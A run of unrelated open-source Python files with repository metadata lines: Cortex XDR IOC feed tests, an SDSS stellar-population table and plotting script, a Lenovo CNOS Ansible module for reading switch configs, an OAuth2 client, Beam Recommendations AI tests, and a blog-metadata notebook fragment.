Client.tag = demisto.params().get('feedTags', demisto.params().get('tag', Client.tag))
Client.tlp_color = demisto.params().get('tlp_color')
client = Client({'url': 'yana'})
xdr_res = {'reply': list(map(lambda xdr_ioc: xdr_ioc[0], TestXDRIOCToDemisto.data_test_xdr_ioc_to_demisto))}
mocker.patch.object(Client, 'http_request', return_value=xdr_res)
get_changes(client)
output = outputs.call_args.args[0]
assert output[0]['fields']['tags'] == expected_tags
assert output[0]['fields'].get('trafficlightprotocol') == expected_tlp_color
def test_file_deleted_for_create_file_sync(mocker):
file_path = 'test'
mocker.patch('XDR_iocs.get_temp_file', return_value=file_path)
open(file_path, 'w').close()
def raise_function(*_args, **_kwargs):
raise DemistoException(file_path)
mocker.patch('XDR_iocs.create_file_sync', new=raise_function)
with pytest.raises(DemistoException):
get_sync_file()
assert os.path.exists(file_path) is False
data_test_test_file_deleted = [
(sync, 'create_file_sync'),
(iocs_to_keep, 'create_file_iocs_to_keep'),
]
@pytest.mark.parametrize('method_to_test,iner_method', data_test_test_file_deleted)
@freeze_time('2020-06-03T02:00:00Z')
def test_file_deleted(mocker, method_to_test, iner_method):
file_path = 'test'
mocker.patch('XDR_iocs.get_temp_file', return_value=file_path)
open(file_path, 'w').close()
def raise_function(*_args, **_kwargs):
raise DemistoException(file_path)
mocker.patch(f'XDR_iocs.{iner_method}', new=raise_function)
with pytest.raises(DemistoException):
method_to_test(None)
assert os.path.exists(file_path) is False
| VirusTotal/content | Packs/CortexXDR/Integrations/XDR_iocs/XDR_iocs_test.py | Python | mit | 33,686 | [
"Amber"
] | 8471ab5f21264c9c7ce8d2a22b3ca3e2c08b0c53a2df69e554ab7a46f0aecd71 |
import time
t0t=time.time()
from os.path import join
import os
import numpy as n
import glob
import sys
import astropy.io.fits as fits
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as p
dV=-9999.99
plate = sys.argv[1] # '9003'
env = sys.argv[2] # '9003'
print plate, env
#python create_summary_tables_sdss_dr12.py 3785 EBOSSDR14_DIR
# initial catalog
init_cat = join( os.environ[env], "catalogs", "perPlate", "sp-"+plate.zfill(4)+".fits")
dir = 'stellarpop'
suffix = ".fits"
out_dir = os.path.join(os.environ[env], 'stellarpop', plate)
im_dir = os.path.join(os.environ[env], 'stellarpop', plate, 'images')
if os.path.isdir(out_dir)==False:
os.makedirs(out_dir)
if os.path.isdir(im_dir)==False:
os.makedirs(im_dir)
path_2_out_file = join( out_dir, "spFlyPlate-"+plate.zfill(4)+".fits")
im_file = "spFlyPlate-"+plate.zfill(4)+".png"
path_2_im_file = os.path.join(im_dir, im_file)
path_2_im_file
prihdr = fits.Header()
prihdr['file'] = os.path.basename(path_2_out_file)
prihdr['plate'] = int(plate)
prihdr['models'] = 'Maraston_2011'
prihdr['library'] = 'MILES'
prihdr['fitter'] = 'FIREFLY'
prihdr['author'] = 'johan comparat'
prihdr['DR'] = 14
def get_table_entry_full(hduSPM):
# print "gets entry"
hduSPM.header
prefix = hduSPM.header['IMF'] + "_" #+ hduSPM.header['library'] + "_"
#print prefix
headerA =" "+prefix+"age_lightW "+prefix+"age_lightW_err_plus "+prefix+"age_lightW_err_minus "+prefix+"metallicity_lightW "+prefix+"metallicity_lightW_err_plus "+prefix+"metallicity_lightW_err_minus "+prefix+"age_massW "+prefix+"age_massW_err_plus "+prefix+"age_massW_err_minus "+prefix+"metallicity_massW "+prefix+"metallicity_massW_err_plus "+prefix+"metallicity_massW_err_minus "+prefix+"stellar_mass "+prefix+"stellar_mass_err_plus "+prefix+"stellar_mass_err_minus "+prefix+"spm_EBV "+prefix+"nComponentsSSP "+prefix+"chi2 "+prefix+"ndof "
table_entry = [10**hduSPM.header['age_lightW']
, 10**hduSPM.header['age_lightW_up']
, 10**hduSPM.header['age_lightW_low']
, hduSPM.header['metallicity_lightW']
, hduSPM.header['metallicity_lightW_up']
, hduSPM.header['metallicity_lightW_low']
, 10**hduSPM.header['age_massW']
, 10**hduSPM.header['age_massW_up']
, 10**hduSPM.header['age_massW_low']
, hduSPM.header['metallicity_massW']
, hduSPM.header['metallicity_massW_up']
, hduSPM.header['metallicity_massW_low']
, hduSPM.header['stellar_mass']
, hduSPM.header['stellar_mass_up']
, hduSPM.header['stellar_mass_low']
, hduSPM.header['EBV']
, hduSPM.header['ssp_number']
, hduSPM.header['chi2']
, hduSPM.header['ndof']
]
#print hduSPM.header
for iii in n.arange(hduSPM.header['ssp_number']):
table_entry.append( hduSPM.header['stellar_mass_ssp_'+str(iii)] )
table_entry.append( hduSPM.header['age_ssp_'+str(iii)] )
table_entry.append( hduSPM.header['metal_ssp_'+str(iii)] )
table_entry.append( hduSPM.header['SFR_ssp_'+str(iii)] )
table_entry.append( hduSPM.header['weightMass_ssp_'+str(iii)] )
table_entry.append( hduSPM.header['weightLight_ssp_'+str(iii)] )
headerA += ' '+prefix+'stellar_mass_ssp_'+str(iii) + ' '+prefix+'ndofage_ssp_'+str(iii) + ' '+prefix+'metal_ssp_'+str(iii) + ' '+prefix+'SFR_ssp_'+str(iii) + ' '+prefix+'weightMass_ssp_'+str(iii) + ' '+prefix+'weightLight_ssp_'+str(iii)
if hduSPM.header['ssp_number']<8 :
for iii in n.arange(hduSPM.header['ssp_number'], 8, 1):
table_entry.append([dV, dV, dV, dV, dV, dV])
headerA += ' '+prefix+'stellar_mass_ssp_'+str(iii) + ' '+prefix+'age_ssp_'+str(iii) + ' '+prefix+'metal_ssp_'+str(iii) + ' '+prefix+'SFR_ssp_'+str(iii) + ' '+prefix+'weightMass_ssp_'+str(iii) + ' '+prefix+'weightLight_ssp_'+str(iii)
table_entry = n.array( n.hstack((table_entry)) )
#print table_entry.shape
return n.hstack((table_entry)), headerA
# step 2 : match to thecreated data set
hdu_orig_table = fits.open(init_cat)
orig_table = hdu_orig_table[1].data
orig_cols = orig_table.columns
table_all = []
headers = ""
for fiber, mjd in zip(orig_table['FIBERID'], orig_table['MJD']):
fitFile = join( os.environ[env], dir, plate, "spFly-"+plate.zfill(4)+"-"+str(mjd)+"-"+str(fiber).zfill(4)+suffix)
if os.path.isfile(fitFile):
#print fitFile
table_entry_1, headers_1 = get_table_entry_full( hduSPM=fits.open(fitFile)[1] )
table_entry_2, headers_2 = get_table_entry_full( hduSPM=fits.open(fitFile)[2] )
table_entry_3, headers_3 = get_table_entry_full( hduSPM=fits.open(fitFile)[3] )
headers = headers_1 + headers_2 + headers_3
table_all.append(n.hstack((table_entry_1, table_entry_2, table_entry_3)))
#print len(table_all[-1])
fitFileLast = fitFile
else:
table_all.append(n.ones(195)*dV)
newDat = n.transpose(table_all)
all_cols = []
for data_array, head in zip(newDat, headers.split()):
all_cols.append(fits.Column(name=head, format='D', array=data_array))
new_cols = fits.ColDefs(all_cols)
tbhdu = fits.BinTableHDU.from_columns(orig_cols + new_cols)
sp_cha=fits.open(fitFileLast)[0]
prihdr['model'] = sp_cha.header['model']
prihdr['ageMin'] = sp_cha.header['ageMin']
prihdr['ageMax'] = sp_cha.header['ageMax']
prihdr['Zmin'] = sp_cha.header['Zmin']
prihdr['Zmax'] = sp_cha.header['Zmax']
prihdu = fits.PrimaryHDU(header=prihdr)
hdu = fits.HDUList([prihdu, tbhdu])
if os.path.isfile(path_2_out_file):
os.remove(path_2_out_file)
hdu.writeto(path_2_out_file)
##################################################
##################################################
test = fits.open(path_2_out_file)
converged3 = (test[1].data['Salpeter_age_lightW'] != dV ) & (test[1].data['Chabrier_age_lightW'] != dV ) & (test[1].data['Kroupa_age_lightW'] != dV )
# now creates the figure per model
fig = p.figure(0, figsize = (8, 8), frameon=False)#, tight_layout=True)
rect = 0.2, 0.15, 0.85, 0.95
#ax = fig.add_axes(rect, frameon=False)
# panel age distribution
fig.add_subplot(2,2,1)
bins = n.arange(6,10,0.1)
nn_s, bb = n.histogram(n.log10(test[1].data['Salpeter_age_lightW'][converged3]), normed = True, bins=bins)
nn_k, bb = n.histogram(n.log10(test[1].data['Kroupa_age_lightW'][converged3]) , normed = True, bins=bins)
nn_c, bb = n.histogram(n.log10(test[1].data['Chabrier_age_lightW'][converged3]), normed = True, bins=bins)
xb = (bins[:-1]+bins[1:])/2.
p.plot(xb, nn_s, label="Salpeter" , rasterized =True )
p.plot(xb, nn_k, label="Kroupa" , rasterized =True )
p.plot(xb, nn_c, label="Chabrier" , rasterized =True )
p.legend(frameon=False)
p.xlabel('log(age/[yr])')
p.ylabel('Normed cumulative distribution')
p.title("plate=" + plate)
p.grid()
# panel stellar mass
fig.add_subplot(2,2,2)
bins = n.arange(8,12.5,0.1)
nn_s, bb = n.histogram(test[1].data['Salpeter_stellar_mass'][converged3], normed = True, bins=bins)
nn_k, bb = n.histogram(test[1].data[ 'Kroupa_stellar_mass'][converged3], normed = True, bins=bins)
nn_c, bb = n.histogram(test[1].data['Chabrier_stellar_mass'][converged3], normed = True, bins=bins)
xb = (bins[:-1]+bins[1:])/2.
p.plot(xb, nn_s, label="Salpeter" , rasterized =True )
p.plot(xb, nn_k, label="Kroupa" , rasterized =True )
p.plot(xb, nn_c, label="Chabrier" , rasterized =True )
p.xlabel(r'$\log(mass/[M_\odot])$')
#p.ylabel('Normed distribution')
p.grid()
# panels stellar mass difference panels
fig.add_subplot(2,2,3)
p.plot(test[1].data[ 'Kroupa_stellar_mass'][converged3], test[1].data['Salpeter_stellar_mass'][converged3] - test[1].data[ 'Kroupa_stellar_mass'][converged3], 'k+', rasterized = True, label='Salpeter - Kroupa')
p.xlabel(r'$\log(mass/[M_\odot])$ Kroupa')
p.ylabel(r'$\Delta(\log(M)$')
p.grid()
p.ylim((-0.6,0.6))
p.legend(frameon=False)
fig.add_subplot(2,2,4)
p.plot(test[1].data[ 'Kroupa_stellar_mass'][converged3], test[1].data['Chabrier_stellar_mass'][converged3] - test[1].data[ 'Kroupa_stellar_mass'][converged3], 'k+', rasterized = True, label='Chabrier - Kroupa')
p.xlabel(r'$\log(mass/[M_\odot])$ Kroupa')
#p.ylabel('mass (Chabrier - Kroupa)')
p.ylim((-0.6,0.6))
p.legend(frameon=False)
p.grid()
p.savefig(path_2_im_file)
p.clf()
print time.time()-t0t
sys.exit()
orig_cols.del_col('CHUNK' )
#orig_cols.del_col('PROGRAMNAME' )
orig_cols.del_col('PLATERUN' )
#orig_cols.del_col('PLATEQUALITY' )
#orig_cols.del_col('PLATESN2' )
orig_cols.del_col('DEREDSN2' )
orig_cols.del_col('LAMBDA_EFF' )
orig_cols.del_col('BLUEFIBER' )
orig_cols.del_col('ZOFFSET' )
orig_cols.del_col('SNTURNOFF' )
orig_cols.del_col('NTURNOFF' )
orig_cols.del_col('SPECPRIMARY' )
orig_cols.del_col('SPECSDSS' )
orig_cols.del_col('SPECLEGACY' )
orig_cols.del_col('SPECSEGUE' )
orig_cols.del_col('SPECSEGUE1' )
orig_cols.del_col('SPECSEGUE2' )
orig_cols.del_col('SPECBOSS' )
#orig_cols.del_col('BOSS_SPECOBJ_ID' )
orig_cols.del_col('SEGUE1_TARGET1' )
orig_cols.del_col('SEGUE1_TARGET2' )
orig_cols.del_col('SEGUE2_TARGET1' )
orig_cols.del_col('SEGUE2_TARGET2' )
orig_cols.del_col('MARVELS_TARGET1' )
orig_cols.del_col('MARVELS_TARGET2' )
orig_cols.del_col('PLATEID' )
orig_cols.del_col('NSPECOBS' )
orig_cols.del_col('FIRSTRELEASE' )
orig_cols.del_col('DESIGNID' )
orig_cols.del_col('CX' )
orig_cols.del_col('CY' )
orig_cols.del_col('CZ' )
orig_cols.del_col('XFOCAL' )
orig_cols.del_col('YFOCAL' )
orig_cols.del_col('TFILE' )
orig_cols.del_col('TCOLUMN' )
orig_cols.del_col('NPOLY' )
orig_cols.del_col('THETA' )
orig_cols.del_col('WAVEMIN' )
orig_cols.del_col('WAVEMAX' )
orig_cols.del_col('WCOVERAGE' )
#orig_cols.del_col('SN_MEDIAN_ALL' )
#orig_cols.del_col('SN_MEDIAN' )
orig_cols.del_col('CHI68P' )
orig_cols.del_col('FRACNSIGMA' )
orig_cols.del_col('FRACNSIGHI' )
orig_cols.del_col('FRACNSIGLO' )
orig_cols.del_col('SPECTROFLUX' )
orig_cols.del_col('SPECTROFLUX_IVAR' )
orig_cols.del_col('SPECTROSYNFLUX' )
orig_cols.del_col('SPECTROSYNFLUX_IVAR' )
orig_cols.del_col('SPECTROSKYFLUX' )
orig_cols.del_col('ANYANDMASK' )
orig_cols.del_col('ANYORMASK' )
orig_cols.del_col('SPEC1_G' )
orig_cols.del_col('SPEC1_R' )
orig_cols.del_col('SPEC1_I' )
orig_cols.del_col('SPEC2_G' )
orig_cols.del_col('SPEC2_R' )
orig_cols.del_col('SPEC2_I' )
orig_cols.del_col('ELODIE_FILENAME' )
orig_cols.del_col('ELODIE_OBJECT' )
orig_cols.del_col('ELODIE_SPTYPE' )
orig_cols.del_col('ELODIE_BV' )
orig_cols.del_col('ELODIE_TEFF' )
orig_cols.del_col('ELODIE_LOGG' )
orig_cols.del_col('ELODIE_FEH' )
orig_cols.del_col('ELODIE_Z' )
orig_cols.del_col('ELODIE_Z_ERR' )
orig_cols.del_col('ELODIE_Z_MODELERR' )
orig_cols.del_col('ELODIE_RCHI2' )
orig_cols.del_col('ELODIE_DOF' )
orig_cols.del_col('Z_PERSON' )
orig_cols.del_col('CLASS_PERSON' )
orig_cols.del_col('Z_CONF_PERSON' )
orig_cols.del_col('COMMENTS_PERSON' )
orig_cols.del_col('CALIBFLUX' )
orig_cols.del_col('CALIBFLUX_IVAR' )
orig_cols.del_col('SURVEY' )
orig_cols.del_col('INSTRUMENT' )
orig_cols.del_col('CHUNK' )
orig_cols.del_col('PROGRAMNAME' )
orig_cols.del_col('PLATERUN' )
orig_cols.del_col('PLATEQUALITY' )
orig_cols.del_col('PLATESN2' )
orig_cols.del_col('DEREDSN2' )
orig_cols.del_col('LAMBDA_EFF' )
orig_cols.del_col('BLUEFIBER' )
orig_cols.del_col('ZOFFSET' )
orig_cols.del_col('SNTURNOFF' )
orig_cols.del_col('NTURNOFF' )
orig_cols.del_col('SPECPRIMARY' )
orig_cols.del_col('SPECSDSS' )
orig_cols.del_col('SPECLEGACY' )
orig_cols.del_col('SPECSEGUE' )
orig_cols.del_col('SPECSEGUE1' )
orig_cols.del_col('SPECSEGUE2' )
orig_cols.del_col('SPECBOSS' )
orig_cols.del_col('BOSS_SPECOBJ_ID' )
orig_cols.del_col('SPECOBJID' )
orig_cols.del_col('FLUXOBJID' )
orig_cols.del_col('BESTOBJID' )
orig_cols.del_col('TARGETOBJID' )
orig_cols.del_col('PLATEID' )
orig_cols.del_col('NSPECOBS' )
orig_cols.del_col('FIRSTRELEASE' )
orig_cols.del_col('RUN2D' )
orig_cols.del_col('RUN1D' )
orig_cols.del_col('DESIGNID' )
orig_cols.del_col('CX' )
orig_cols.del_col('CY' )
orig_cols.del_col('CZ' )
orig_cols.del_col('XFOCAL' )
orig_cols.del_col('YFOCAL' )
orig_cols.del_col('SOURCETYPE' )
orig_cols.del_col('TARGETTYPE' )
orig_cols.del_col('PRIMTARGET' )
orig_cols.del_col('SECTARGET' )
orig_cols.del_col('LEGACY_TARGET1' )
orig_cols.del_col('LEGACY_TARGET2' )
orig_cols.del_col('SPECIAL_TARGET1' )
orig_cols.del_col('SPECIAL_TARGET2' )
orig_cols.del_col('SEGUE1_TARGET1' )
orig_cols.del_col('SEGUE1_TARGET2' )
orig_cols.del_col('SEGUE2_TARGET1' )
orig_cols.del_col('SEGUE2_TARGET2' )
orig_cols.del_col('MARVELS_TARGET1' )
orig_cols.del_col('MARVELS_TARGET2' )
orig_cols.del_col('BOSS_TARGET1' )
orig_cols.del_col('BOSS_TARGET2' )
orig_cols.del_col('EBOSS_TARGET0' )
orig_cols.del_col('ANCILLARY_TARGET1')
orig_cols.del_col('ANCILLARY_TARGET2')
orig_cols.del_col('SPECTROGRAPHID' )
orig_cols.del_col('PLATE' )
orig_cols.del_col('TILE' )
orig_cols.del_col('MJD' )
orig_cols.del_col('FIBERID' )
orig_cols.del_col('OBJID' )
orig_cols.del_col('PLUG_RA' )
orig_cols.del_col('PLUG_DEC' )
orig_cols.del_col('CLASS' )
orig_cols.del_col('SUBCLASS' )
orig_cols.del_col('Z' )
orig_cols.del_col('Z_ERR' )
orig_cols.del_col('RCHI2' )
orig_cols.del_col('DOF' )
orig_cols.del_col('RCHI2DIFF' )
orig_cols.del_col('TFILE' )
orig_cols.del_col('TCOLUMN' )
orig_cols.del_col('NPOLY' )
orig_cols.del_col('THETA' )
orig_cols.del_col('VDISP' )
orig_cols.del_col('VDISP_ERR' )
orig_cols.del_col('VDISPZ' )
orig_cols.del_col('VDISPZ_ERR' )
orig_cols.del_col('VDISPCHI2' )
orig_cols.del_col('VDISPNPIX' )
orig_cols.del_col('VDISPDOF' )
orig_cols.del_col('WAVEMIN' )
orig_cols.del_col('WAVEMAX' )
orig_cols.del_col('WCOVERAGE' )
orig_cols.del_col('ZWARNING' )
orig_cols.del_col('SN_MEDIAN_ALL' )
orig_cols.del_col('SN_MEDIAN' )
orig_cols.del_col('CHI68P' )
orig_cols.del_col('FRACNSIGMA' )
orig_cols.del_col('FRACNSIGHI' )
orig_cols.del_col('FRACNSIGLO' )
orig_cols.del_col('SPECTROFLUX' )
orig_cols.del_col('SPECTROFLUX_IVAR' )
orig_cols.del_col('SPECTROSYNFLUX' )
orig_cols.del_col('SPECTROSYNFLUX_IVAR' )
orig_cols.del_col('SPECTROSKYFLUX' )
orig_cols.del_col('ANYANDMASK' )
orig_cols.del_col('ANYORMASK' )
orig_cols.del_col('SPEC1_G' )
orig_cols.del_col('SPEC1_R' )
orig_cols.del_col('SPEC1_I' )
orig_cols.del_col('SPEC2_G' )
orig_cols.del_col('SPEC2_R' )
orig_cols.del_col('SPEC2_I' )
orig_cols.del_col('ELODIE_FILENAME' )
orig_cols.del_col('ELODIE_OBJECT' )
orig_cols.del_col('ELODIE_SPTYPE' )
orig_cols.del_col('ELODIE_BV' )
orig_cols.del_col('ELODIE_TEFF' )
orig_cols.del_col('ELODIE_LOGG' )
orig_cols.del_col('ELODIE_FEH' )
orig_cols.del_col('ELODIE_Z' )
orig_cols.del_col('ELODIE_Z_ERR' )
orig_cols.del_col('ELODIE_Z_MODELERR' )
orig_cols.del_col('ELODIE_RCHI2' )
orig_cols.del_col('ELODIE_DOF' )
orig_cols.del_col('Z_NOQSO' )
orig_cols.del_col('Z_ERR_NOQSO' )
orig_cols.del_col('ZWARNING_NOQSO' )
orig_cols.del_col('CLASS_NOQSO' )
orig_cols.del_col('SUBCLASS_NOQSO' )
orig_cols.del_col('RCHI2DIFF_NOQSO' )
orig_cols.del_col('Z_PERSON' )
orig_cols.del_col('CLASS_PERSON' )
orig_cols.del_col('Z_CONF_PERSON' )
orig_cols.del_col('COMMENTS_PERSON' )
orig_cols.del_col('CALIBFLUX' )
orig_cols.del_col('CALIBFLUX_IVAR' )
| JohanComparat/pySU | spm/bin/create_summary_tables.py | Python | cc0-1.0 | 17,858 | [
"Firefly"
] | 9bf93ac606254c0a5f4d3d3c8a9537b48e1a0792f5060ece272616144ff604c1 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2017 Lenovo, Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
# Module to display running config of Switches
# Lenovo Networking
#
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'version': '1.0'}
DOCUMENTATION = '''
---
module: cnos_showrun
short_description: Collect the current running configuration on devices running Lenovo CNOS
description:
- This module allows you to view the switch running configuration. It executes the display running-config CLI
command on a switch and returns a file containing the current running configuration of the target network
device. This module uses SSH to manage network device configuration.
The results of the operation will be placed in a directory named 'results'
that must be created by the user in their local directory to where the playbook is run.
For more information about this module from Lenovo and customizing it usage for your
use cases, please visit our [User Guide](http://systemx.lenovofiles.com/help/index.jsp?topic=%2Fcom.lenovo.switchmgt.ansible.doc%2Fcnos_showrun.html)
version_added: "2.3"
extends_documentation_fragment: cnos
options: {}
'''
EXAMPLES = '''
Tasks : The following are examples of using the module cnos_showrun. These are written in the main.yml file of the tasks directory.
---
- name: Run show running-config
cnos_showrun:
host: "{{ inventory_hostname }}"
username: "{{ hostvars[inventory_hostname]['username'] }}"
password: "{{ hostvars[inventory_hostname]['password'] }}"
deviceType: "{{ hostvars[inventory_hostname]['deviceType'] }}"
enablePassword: "{{ hostvars[inventory_hostname]['enablePassword'] }}"
outputfile: "./results/test_showrun_{{ inventory_hostname }}_output.txt"
'''
RETURN = '''
return value: |
On successful execution, the method returns a message in JSON format
[Running Configuration saved in file]
Upon any failure, the method returns an error display string.
'''
import sys
import paramiko
import time
import argparse
import socket
import array
import json
import time
import re
try:
from ansible.module_utils import cnos
HAS_LIB = True
except:
HAS_LIB = False
from ansible.module_utils.basic import AnsibleModule
from collections import defaultdict
def main():
module = AnsibleModule(
argument_spec=dict(
outputfile=dict(required=True),
host=dict(required=True),
username=dict(required=True),
password=dict(required=True, no_log=True),
enablePassword=dict(required=False, no_log=True),),
supports_check_mode=False)
username = module.params['username']
password = module.params['password']
enablePassword = module.params['enablePassword']
cliCommand = "display running-config"
outputfile = module.params['outputfile']
hostIP = module.params['host']
output = ""
# Create instance of SSHClient object
remote_conn_pre = paramiko.SSHClient()
# Automatically add untrusted hosts (make sure okay for security policy in your environment)
remote_conn_pre.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# initiate SSH connection with the switch
remote_conn_pre.connect(hostIP, username=username, password=password)
time.sleep(2)
# Use invoke_shell to establish an 'interactive session'
remote_conn = remote_conn_pre.invoke_shell()
time.sleep(2)
# Enable and enter configure terminal then send command
output = output + cnos.waitForDeviceResponse("\n", ">", 2, remote_conn)
output = output + cnos.enterEnableModeForDevice(enablePassword, 3, remote_conn)
# Make terminal length = 0
output = output + cnos.waitForDeviceResponse("terminal length 0\n", "#", 2, remote_conn)
# Send the CLi command
output = output + cnos.waitForDeviceResponse(cliCommand + "\n", "#", 2, remote_conn)
# Save it into the file
file = open(outputfile, "a")
file.write(output)
file.close()
errorMsg = cnos.checkOutputForError(output)
if(errorMsg is None):
module.exit_json(changed=True, msg="Running Configuration saved in file ")
else:
module.fail_json(msg=errorMsg)
if __name__ == '__main__':
main()
| adityacs/ansible | lib/ansible/modules/network/lenovo/cnos_showrun.py | Python | gpl-3.0 | 4,951 | [
"VisIt"
] | 7c0cb18fb0febdef08fc00fd5ddb8b002fe0aa15e6121a1affbf5f262848552d |
__author__ = "Samuel Jackson"
__date__ = "December 2, 2014"
__license__ = "MIT"
import requests
import json
from constants import *
from request_handler import RequestHandler
class OAuth2ResourceOwner(RequestHandler):
""" Handles retrieving resources from the specified end-points.
This extension adds functionality for the resource owner OAuth2
specification. Authentication is originally supplied by the user via their
username and password (resource credentials). Access and refresh tokens are
obtained and can be cached locally. This class will automatically handle
refreshing the tokens ase required. See RFC6749 for more info.
:param token_endpoint: the end point to request oauth2 tokens from.
"""
def __init__(self, token_endpoint):
super(OAuth2ResourceOwner, self).__init__()
self.token_endpoint = token_endpoint
def request_auth_with_client_credentials(self, username, password):
"""Request authentication using the resource owners credentials
This accquires the access tokens for the first time and discards the
username and password once used.
:param username: username of the resource owner
:param password: password of the resource owner
"""
payload = {'grant_type': 'password', 'username': username, 'password': password}
response = self.make_request(self.token_endpoint, params=payload)
json_response = response.json()
if 'access_token' not in json_response:
raise ValueError("Access token not present in response!")
if 'refresh_token' not in json_response:
raise ValueError("Refresh token not present in response!")
self._refresh_auth_state(json_response)
def request_auth_with_refresh_token(self):
"""Use a refresh token to generate a new oauth access token."""
payload = {
'grant_type': 'refresh_token',
'refresh_token': self.refresh_token
}
response = self.make_request(self.token_endpoint, params=payload)
json_response = response.json()
self._refresh_auth_state(json_response)
def make_request(self, end_point, end_point_vars={}, params={}):
"""Make a request to Csa API at the specified end point
This method is override from the request handler class and will refresh
the oauth tokens if neccessary.
:param end_point: string representing the end resource request
:param end_point_vars: dictionary of variables to be replaced in the uri
:param params: dictionary of parameters to be passed via GET/POST
"""
response = super(OAuth2ResourceOwner, self) \
.make_request(end_point, end_point_vars, params)
if response.status_code == requests.codes.unauthorized:
if not 'error' in response.text:
self.request_auth_with_refresh_token()
response = super(OAuth2ResourceOwner, self) \
.make_request(end_point, end_point_vars, params)
else:
raise requests.exceptions.HTTPError(response.text)
response.raise_for_status()
return response
def get_tokens(self):
"""Get dictionary of tokens"""
token_data = {
'access_token': self.access_token,
'refresh_token': self.refresh_token
}
return token_data
def set_tokens(self,token_data):
"""Get dictionary of tokens"""
self._refresh_auth_state(token_data)
def _refresh_auth_state(self, tokens):
"""Refresh the access tokens used to authenticate requests
:param tokens: dict containing the access_tokens
"""
self.access_token = tokens['access_token']
self.refresh_token = tokens['refresh_token']
self.session.auth = OAuth2Tokens(self.access_token)
class OAuth2Tokens(requests.auth.AuthBase):
"""Authorization extensions of the requests.auth.AuthBase class
Adds support for appending the access token to a request.
:param token: access token used with the resource request
"""
def __init__(self, token):
self.token = token
def __call__(self, r):
#append the access token to the body
body = json.loads(r.body)
body.update({'access_token': self.token})
r.body = json.dumps(body)
return r
| samueljackson92/CSAlumni-client | csa_client/oauth.py | Python | mit | 4,438 | [
"ASE"
] | 2743659c959a9f5ba6165db6bf6221e52b4e6904524578c34604abdaf1b60d5d |
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Integration tests for Recommendations AI transforms."""
from __future__ import absolute_import
import random
import unittest
from nose.plugins.attrib import attr
import apache_beam as beam
from apache_beam.testing.test_pipeline import TestPipeline
from apache_beam.testing.util import assert_that
from apache_beam.testing.util import equal_to
from apache_beam.testing.util import is_not_empty
# pylint: disable=wrong-import-order, wrong-import-position, ungrouped-imports
try:
from google.cloud import recommendationengine
from apache_beam.ml.gcp import recommendations_ai
except ImportError:
recommendationengine = None
# pylint: enable=wrong-import-order, wrong-import-position, ungrouped-imports
GCP_TEST_PROJECT = 'apache-beam-testing'
def extract_id(response):
yield response["id"]
def extract_event_type(response):
yield response["event_type"]
def extract_prediction(response):
yield response[0]["results"]
@attr('IT')
@unittest.skipIf(
recommendationengine is None,
"Recommendations AI dependencies not installed.")
class RecommendationAIIT(unittest.TestCase):
def test_create_catalog_item(self):
CATALOG_ITEM = {
"id": str(int(random.randrange(100000))),
"title": "Sample laptop",
"description": "Indisputably the most fantastic laptop ever created.",
"language_code": "en",
"category_hierarchies": [{
"categories": ["Electronic", "Computers"]
}]
}
with TestPipeline(is_integration_test=True) as p:
output = (
p | 'Create data' >> beam.Create([CATALOG_ITEM])
| 'Create CatalogItem' >>
recommendations_ai.CreateCatalogItem(project=GCP_TEST_PROJECT)
| beam.ParDo(extract_id) | beam.combiners.ToList())
assert_that(output, equal_to([[CATALOG_ITEM["id"]]]))
def test_create_user_event(self):
USER_EVENT = {"event_type": "page-visit", "user_info": {"visitor_id": "1"}}
with TestPipeline(is_integration_test=True) as p:
output = (
p | 'Create data' >> beam.Create([USER_EVENT]) | 'Create UserEvent' >>
recommendations_ai.WriteUserEvent(project=GCP_TEST_PROJECT)
| beam.ParDo(extract_event_type) | beam.combiners.ToList())
assert_that(output, equal_to([[USER_EVENT["event_type"]]]))
def test_predict(self):
USER_EVENT = {"event_type": "page-visit", "user_info": {"visitor_id": "1"}}
with TestPipeline(is_integration_test=True) as p:
output = (
p | 'Create data' >> beam.Create([USER_EVENT])
| 'Predict UserEvent' >> recommendations_ai.PredictUserEvent(
project=GCP_TEST_PROJECT, placement_id="recently_viewed_default")
| beam.ParDo(extract_prediction))
assert_that(output, is_not_empty())
if __name__ == '__main__':
print(recommendationengine.CatalogItem.__module__)
unittest.main()
| lukecwik/incubator-beam | sdks/python/apache_beam/ml/gcp/recommendations_ai_test_it.py | Python | apache-2.0 | 3,665 | [
"VisIt"
] | 2e04da736e0f54e64d56fa4f25a66e8f33c40d374fc4f9346274e44866f42f65 |
# coding: utf-8
# In[1]:
from __future__ import print_function
name = '2018-05-29-scrape_binstar'
title = "Binstar/conda package stats"
import os
from datetime import datetime
#from IPython.core.display import HTML
# with open('creative_commons.txt', 'r') as f:
# html = f.read()
# html = '''
# <small>
# <p> This post was written as an IPython notebook.
# It is available for <a href='https://ocefpaf.github.com/python4oceanographers/downloads/notebooks/%s.ipynb'>download</a>
# or as a static <a href='https://nbviewer.ipython.org/url/ocefpaf.github.com/python4oceanographers/downloads/notebooks/%s.ipynb'>html</a>.</p>
# <p></p>
# %s''' % (name, name, html)
#get_ipython().magic(u'matplotlib inline')
from matplotlib import style
style.use('ggplot')
hour = datetime.utcnow().strftime('%H:%M')
comments="true"
date = '-'.join(name.split('-')[:3])
slug = '-'.join(name.split('-')[3:])
metadata = dict(title=title,
date=date,
hour=hour,
comments=comments,
slug=slug,
name=name)
markdown = """Title: {title}
date: {date} {hour}
comments: {comments}
slug: {slug}
